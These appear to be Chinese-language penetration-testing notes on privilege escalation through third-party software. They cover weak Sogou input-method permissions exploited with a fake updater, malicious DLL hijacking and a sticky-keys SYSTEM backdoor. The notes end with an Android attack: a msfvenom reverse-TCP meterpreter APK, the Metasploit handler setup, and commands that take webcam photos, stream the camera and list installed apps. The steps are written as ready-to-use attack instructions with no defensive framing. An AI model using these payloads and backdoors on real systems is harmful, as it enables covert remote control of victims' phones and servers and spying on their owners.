第三方提权

第三方提权

可以进入注册表查看装了哪些软件

搜狗输入法提权

原理：通过搜狗输入法的权限不严格，在默认安装搜狗输入法时，权限赋予过大，everyone（所有）权限（绝对控制）

通过伪造exe文件，例如更新程序，在对方进行软件更新或内容更新时，自动执行提前写好的bat脚本（quick batch）

FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法

LPK劫持（dll劫持）

一种是需要程序本身的dll，根据函数仿制一个dll

另一种是直接生成一个恶意dll，放在某一个目录下，对方重启程序后生效

前置条件：对方经常使用此软件（要重启软件），对方开远程桌面（端口可能被修改，在shell里看一下即可）

后门生效后，远控连接对方服务器，在登录界面5次shift键调用粘贴后输入提前设置好的命令，验证密码后弹出一个类似控制面板，可以对服务器进行操作，且cmd权限为system

对安卓手机渗透测试

kali中msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > shell.apk

生成后可以在Android Killer中做处理

软件名称

在msf中设置payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.43.105

set LPORT 4444

run

拍照：webcam_snap

开摄像头：webcam_stream -i 1

查看安装的app：app_list

?